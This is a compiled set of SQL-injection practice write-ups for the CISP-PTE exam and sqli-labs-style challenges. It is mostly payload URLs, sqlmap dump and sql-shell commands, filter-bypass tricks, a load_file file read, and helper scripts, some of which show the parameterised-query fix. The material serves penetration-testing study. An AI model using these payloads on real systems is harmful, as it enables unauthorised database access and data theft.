[CISP-PTE] SQL injection practice problems

2023-07-07 21:22 | Source: compiled from the web

Contents
1. This Spring Festival is different from previous years
   1.1 Manual injection
   1.2 sqlmap injection
2. Article publishing system
3. Article publishing system 2
4. [Chapter 1: Web basics] SQL injection-1
5. sqli-labs 1-15
6. Wide-byte injection: [极客大挑战 2019]HardSQL
7. SQL file read

1. This Spring Festival is different from previous years (今年的春节,不同往年)

http://140.210.203.168:28881

1.1 Manual injection

The challenge states up front that the comment characters # and -- are filtered.

Close the quote with a single quote. Because comments are filtered, the end of each payload is written so that the application's own closing quote completes it, instead of being commented out. Closure test:

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1=1

The page echoes the SQL it ran, which shows that the parameter is wrapped in single quotes:

select * from Article where uuid = '983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1'

Closure:

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1

Closure succeeded.

2. Enumerate the column count, trying one more column at a time

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,3,4,5 or 1='1
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,3,4,5,6 or 1='1

With 6 columns the query succeeds and column 2 is echoed on the page. The trailing or 1='1 is not a separate condition: it becomes part of the last column's expression (6 or 1='1'), and the application's own closing quote completes the literal, so no comment character is needed.

3. Enumerate the database

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,database(),3,4,5,6 or 1='1

The database name is 2web (every query below references this name).

4. Enumerate the tables

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='2web'),3,4,5,6 or 1='1

Two tables: Article and IS_KEY.

5. Enumerate the columns of IS_KEY

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='2web' and table_name='IS_KEY'),3,4,5,6 and 1='1

One column: haha.

6. Dump the data

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(haha) from IS_KEY ),3,4,5,6 and 1='1

Result: key1:abcd1234
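The manual chain above works because the uuid parameter is pasted straight into the query string. The following script is an added example (not code from the write-up or the challenge) that reproduces that bug and the fix side by side. SQLite stands in for MySQL, so sqlite_master plays the role of information_schema.tables; the Article and IS_KEY tables follow the write-up, and the row contents are constructed sample data. The payloads are the write-up's, with the same trailing or 1='1 / and 1='1 trick that lets the application's closing quote finish the statement.

```python
import sqlite3

# Added example, not part of the original write-up. SQLite stands in for MySQL:
# sqlite_master plays the role of information_schema.tables. Table and column
# names (Article with six columns, IS_KEY with column haha) follow the write-up;
# the row contents are constructed sample data.
UUID = "983fd952-df4e-4b63-946f-f2e6bb0327d6"


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE Article(id INTEGER, title TEXT, body TEXT, author TEXT,
                             created TEXT, uuid TEXT);
        CREATE TABLE IS_KEY(haha TEXT);
        INSERT INTO Article VALUES (1, 'Spring Festival', 'hello', 'admin',
                                    '2023-01-22', '983fd952-df4e-4b63-946f-f2e6bb0327d6');
        INSERT INTO IS_KEY VALUES ('key1:abcd1234');
        """
    )
    return con


def lookup_vulnerable(con: sqlite3.Connection, uuid: str) -> list:
    """String-concatenated query: the exact pattern the echoed SQL on the page reveals."""
    sql = f"select * from Article where uuid = '{uuid}'"
    return con.execute(sql).fetchall()


def lookup_safe(con: sqlite3.Connection, uuid: str) -> list:
    """Parameterised query: the payload is bound as data and never parsed as SQL."""
    return con.execute("select * from Article where uuid = ?", (uuid,)).fetchall()


# The write-up's payloads. Each ends in  or 1='1  (or  and 1='1 ) so that the
# application's own closing quote completes the literal; no comment character needed.
PAYLOAD_TABLES = (UUID + "' union select 1,(select group_concat(name) from sqlite_master "
                  "where type='table'),3,4,5,6 or 1='1")
PAYLOAD_KEY = UUID + "' union select 1,(select group_concat(haha) from IS_KEY),3,4,5,6 and 1='1"


def column_two(rows: list) -> list:
    """The page echoes column 2 of every returned row; collect that column."""
    return [r[1] for r in rows]


def demo() -> tuple:
    con = make_db()
    tables = column_two(lookup_vulnerable(con, PAYLOAD_TABLES))  # contains 'Article,IS_KEY'
    key = column_two(lookup_vulnerable(con, PAYLOAD_KEY))        # contains 'key1:abcd1234'
    safe = lookup_safe(con, PAYLOAD_KEY)                         # [] : payload matched nothing
    return tables, key, safe


if __name__ == "__main__":
    print(demo())
```

The union row lands in the result set next to the genuine article row, which is why the write-up first had to find a column count (6) that matches the Article table; with the parameterised version the same string is simply a uuid that no row has.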

1.2 sqlmap injection

Detect the injection:

python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5

Enumerate the database:

python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 --current-db

Enumerate tables:

python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web --tables

Enumerate columns:

python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web -T IS_KEY --columns

Dump the column:

python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web -T IS_KEY -C "haha" --dump

2. Article publishing system

http://140.210.203.168:17111/admin.php

sqlmap injection. Enumerate the database:

python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 --current-db

Enumerate tables:

python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 -D 2web --tables

Enumerate columns:

python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 -D 2web -T users1 --columns

Dump the column:

python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 -D 2web -T users1 -C "XremarkX4354" --dump

3. Article publishing system 2

http://118.195.198.108:20000

sqlmap injection, finishing with --sql-shell. Register a user, publish an article, capture the request in the proxy and save it as sql.txt. Enumerate the database with sqlmap:

python sqlmap.py -r sql.txt --risk 3 --level 5 --current-db

Enumerate tables:

python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web --tables

Enumerate columns:

python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web -T users1 --columns

Dump the columns:

python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web -T users1 -C "username,0x3a,password" --dump

This fails to dump the data. (Note that -C takes a comma-separated list of column names; 0x3a is the separator used inside concat()/group_concat() in the manual payloads, not a column.) Summary of what has been obtained so far: database 2web, table users1, columns username and password. Run a SQL shell through sqlmap instead:

python sqlmap.py -r sql.txt --sql-shell

and in the shell:

select * from 2web.users1 limit 1

or

select * from 2web.users1 where username='admin'

Or run the SQL directly from the sqlmap command line:

python sqlmap.py -r sql.txt --sql-query="select * from 2web.users1 limit 1"

4. [Chapter 1: Web basics] SQL injection-1

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81

union-based injection. Closure test:

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 #

A literal # has no effect here, but not because the application filters it: in a URL the # is the fragment delimiter and the browser never sends it to the server. It has to be URL-encoded as %23, or -- used with a trailing space (written --+ in the URL):

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 %23
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 --+

Both %23 and --+ work, so the closure succeeded.

Enumerate the column count:

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' order by 30 --+ http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' order by 3 --+

order by 30 errors and order by 3 succeeds, so there are 3 columns.

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' union select 1,2,3 --+

This confirms 3 columns. To see which columns are echoed, use a non-existent id so that only the union row is displayed:

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,2,3 --+

Enumerate the database:

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,database(),3 --+

The database name is note.

Enumerate tables:

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='note'),3 --+

Two tables: fl4g and notes. Enumerate the columns of fl4g:

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='note' and table_name='fl4g'),3 --+

The column name is fllllag.

Dump the column:

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(fllllag) from fl4g),3 and 1=1 --+

Flag: n1book{union_select_is_so_cool}

5. sqli-labs 1-15

Error-based injection with updatexml / extractvalue

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1

Closure test:

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1 and 1=1 %23

As in the previous challenge, a literal # is never sent by the browser (it is the URL fragment delimiter), so the comment is written as %23. The page shows MySQL errors, so error-based injection is used. Enumerate the database:

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,database()),1) %23

Enumerate tables:

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1) %23

The subquery returns more than one row, which updatexml cannot take as an argument, so only one row can be read per request. Fetch the tables one at a time with limit:

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1) %23

Result: emails

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1)),1) %23

Result: referers

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 2,1)),1) %23

Result: uagents

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1)),1) %23

Result: users

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 4,1)),1) %23

Result: empty, so there are exactly four tables. Enumerate the columns of users:

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)),1) %23
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1)),1) %23
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1)),1) %23

Three columns: id, username, password.

Dump the column contents:

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users limit 0,1)),1) %23

XPATH syntax error: '~Dumb:Dumb,Angelina:I-kill-you,D'

The echoed value is cut off: updatexml() and extractvalue() only report the first 32 characters of the offending XPath string (the 0x7e marker counts as one of them), so the result is incomplete. Reference: https://www.wolai.com/ctfhub/qXx5vurg8fRgasaZAVDo8W. The MID() function extracts a substring from a text value and can be used to read the result in slices:

SELECT MID(column_name,start[,length]) FROM table_name;
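Reading a long value through that 32-character window means issuing one request per 31-character slice, each wrapping the subquery in mid(). The script below is an added example, not code from the write-up; the target is simulated by fake_error_page(), which evaluates only the mid() slice and returns the XPATH error text that updatexml() would leave on the Less-1 page. SAMPLE_ROWS is constructed sample data standing in for group_concat(username,0x3a,password) from users (its first 32 characters match the error shown above).

```python
import re

# Added example, not the write-up's code. The target is simulated: fake_error_page()
# stands in for Less-1 and returns the XPATH error that MySQL's updatexml() would put
# on the page. SAMPLE_ROWS is constructed sample data for
# group_concat(username,0x3a,password) from users.
SAMPLE_ROWS = "Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity"
ERROR_LIMIT = 32   # updatexml()/extractvalue() echo at most 32 characters of the XPath string
SUBQUERY = "(select group_concat(username,0x3a,password) from users)"


def build_payload(start=None, length=None) -> str:
    """The page's payload; when start/length are given the subquery is wrapped in mid()."""
    inner = SUBQUERY if start is None else f"mid({SUBQUERY},{start},{length})"
    return f"1' and updatexml(1,concat(0x7e,{inner}),1) %23"


def fake_error_page(payload: str) -> str:
    """Simulated server: evaluates only the mid() slice, then truncates like MySQL does."""
    m = re.search(r"mid\(\(select .*?\),(\d+),(\d+)\)", payload)
    if m:
        start, length = int(m.group(1)), int(m.group(2))
        value = SAMPLE_ROWS[start - 1:start - 1 + length]   # MySQL mid() is 1-based
    else:
        value = SAMPLE_ROWS
    return f"XPATH syntax error: '{('~' + value)[:ERROR_LIMIT]}'"


def read_error(page: str) -> str:
    """Pull the text after the 0x7e marker out of the error message."""
    m = re.search(r"XPATH syntax error: '~(.*)'", page)
    return m.group(1) if m else ""


def dump_via_error(fetch, chunk: int = ERROR_LIMIT - 1) -> str:
    """Page through the value in 31-character slices (32 minus the ~ marker) until a
    slice comes back shorter than requested, which means the end was reached."""
    out, start = "", 1
    while True:
        piece = read_error(fetch(build_payload(start, chunk)))
        out += piece
        if len(piece) < chunk:
            return out
        start += chunk


if __name__ == "__main__":
    print(read_error(fake_error_page(build_payload())))   # the truncated value from the page
    print(dump_via_error(fake_error_page))                 # the full value, reassembled
```

To use it against the real lab, replace fake_error_page with a function that sends the payload in the id parameter and returns the response body; the 0x7e marker at the front is what guarantees the error is raised even when the data itself would parse as a valid XPath expression.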

Less-1, string-type injection:

http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-1/?id=1' order by 5 --+

Less-2, numeric injection:

http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-2/?id=1 order by 5

Less-3, ') closure:

http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-3/?id=1') --+

Less-4, ") closure:

http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-4/?id=1") --+

Less-5, error-based injection:

http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-5/?id=1' and updatexml(1,concat(1,database()),1) --+
http://node2.anna.nssctf.cn:28656/Less-5/?id=1' and updatexml(1,concat(0x7e,(select email_id from emails limit 8,1)),1) --+

Less-6, error-based injection with " closure:

http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-6/?id=1" and updatexml(1,concat(0x7e,database()),1)--+

Less-7, into outfile (this level wraps id in (('...')), hence the ')) closure in the last line):

Less-7/?id=-1' union select 1,2,@@datadir -- #   (data directory)
Less-7/?id=-1' union select 1,2,@@basedir -- #   (installation directory)
Less-7/?id=1')) union select 1,2,3 into outfile "C:\phpStudy\WWW\sqli\Less-7\test.txt" -- #

or sqlmap --sql-shell

Less-8, boolean-based blind: sqlmap

Less-9, time-based blind: sqlmap, or manually:

?id=1' and sleep(5) -- -   (5 s delay)
?id=1" and sleep(5) -- -
?id=1 and sleep(5) -- -
?id=1') and sleep(5) -- -
?id=1") and sleep(5) -- -
?id=1' and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='i',sleep(3),1)-- -

Less-10, time-based blind: sqlmap

?id=1" and sleep(5) --+

Less-11, error-based injection (login form):

' and updatexml(1,concat(0x7e,database()),0) #

Less-12, closure test:

") union select database(),2 #

Less-13, closure test:

1') or 1=1 #
1') and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

Less-14, closure test:

1" or 1=1 #
1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

6. Wide-byte injection: [极客大挑战 2019]HardSQL

http://8c4f169a-d2ef-4cdd-bd7f-74431c549dcc.node4.buuoj.cn:81/check.php?username=1&password=1%27or(updatexml(1,concat(0x7e,database()),1))%23

(The payload above is error-based: parentheses take the place of the filtered spaces, and %27 and %23 are the URL-encoded ' and #.)

7. SQL file read

http://192.168.213.22:81

Read the file /tmp/360/key through the SQL injection; the answer is in the file.

Injection test:

http://192.168.213.22:81/vulnerabilities/fu1.php?id=1'

This errors, so there is an injection point, and the page echoes the SQL:

select * from article where id= ('1'')

Closure: --+ and # are both filtered, but ;%00 terminates the statement (what follows the null byte is dropped before the query reaches MySQL):

http://192.168.213.22:81/vulnerabilities/fu1.php?id=1');%00

Alternatively, since spaces are filtered as well, use /**/ or %0a in their place and balance the quote by hand:

http://192.168.213.22:81/vulnerabilities/fu1.php?id=1')/**/or/**/1=('1

Column count:

http://192.168.213.22:81/vulnerabilities/fu1.php?id=1')/**/order/**/by/**/4;%00

union echo: union is filtered; bypass it by double-writing the keyword, so that after the filter strips the inner "union" once a valid keyword is left behind:

http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1')/**/ununionion/**/select/**/1,2,3,4;%00

Read the key file:

http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1')/**/ununionion/**/select/**/1,2,3,load_file("/tmp/360/key");%00

key:8b3h4a7v
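The three tricks in that last payload (/**/ for spaces, a double-written union, and the ;%00 terminator) all target a blacklist that removes matches in a single pass. The script below is an added example, not code from the write-up or the challenge: naive_filter() is a guessed model of the challenge's filter (the real filter is not shown on the page), strict_filter() shows the minimal change that defeats the double-write, and bypass() applies the write-up's transformations to a plain payload. The null byte's truncation behaviour is not modelled; the terminator is only appended.

```python
import re

# Added example, not the write-up's code. naive_filter() is a guessed model of the
# challenge's blacklist (the real filter is not shown on the page); strict_filter() is
# the same blacklist applied until nothing changes; bypass() applies the write-up's tricks.
BLACKLIST = ("union", "--", "#", " ")


def naive_filter(s: str) -> str:
    """Single-pass strip: each blacklisted token is removed exactly once."""
    for word in BLACKLIST:
        s = s.replace(word, "")
    return s


def strict_filter(s: str) -> str:
    """Same blacklist, repeated until stable, so a nested keyword cannot survive."""
    while True:
        out = naive_filter(s)
        if out == s:
            return out
        s = out


def bypass(payload: str) -> str:
    """Write-up's transformations: /**/ for spaces, double-written union, ;%00 terminator."""
    p = payload.replace(" ", "/**/")
    p = re.sub(r"union", "ununionion", p, flags=re.IGNORECASE)
    return p + ";%00"


def what_mysql_sees(filtered: str) -> str:
    """/**/ is whitespace to MySQL; normalise it so the result reads as SQL."""
    return filtered.replace("/**/", " ")


RAW = "-1') union select 1,2,3,load_file(\"/tmp/360/key\")"   # the write-up's final payload


if __name__ == "__main__":
    sent = bypass(RAW)
    print(what_mysql_sees(naive_filter(sent)))    # ... union select 1,2,3,load_file(...)
    print(what_mysql_sees(strict_filter(sent)))   # union is gone; the query breaks
```

Looping the filter only closes the double-write hole; it still leaves the comment and whitespace substitutions in play. The durable fix is the same as in the first challenge: bind id as a query parameter so that no string on this blacklist is ever parsed as SQL.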

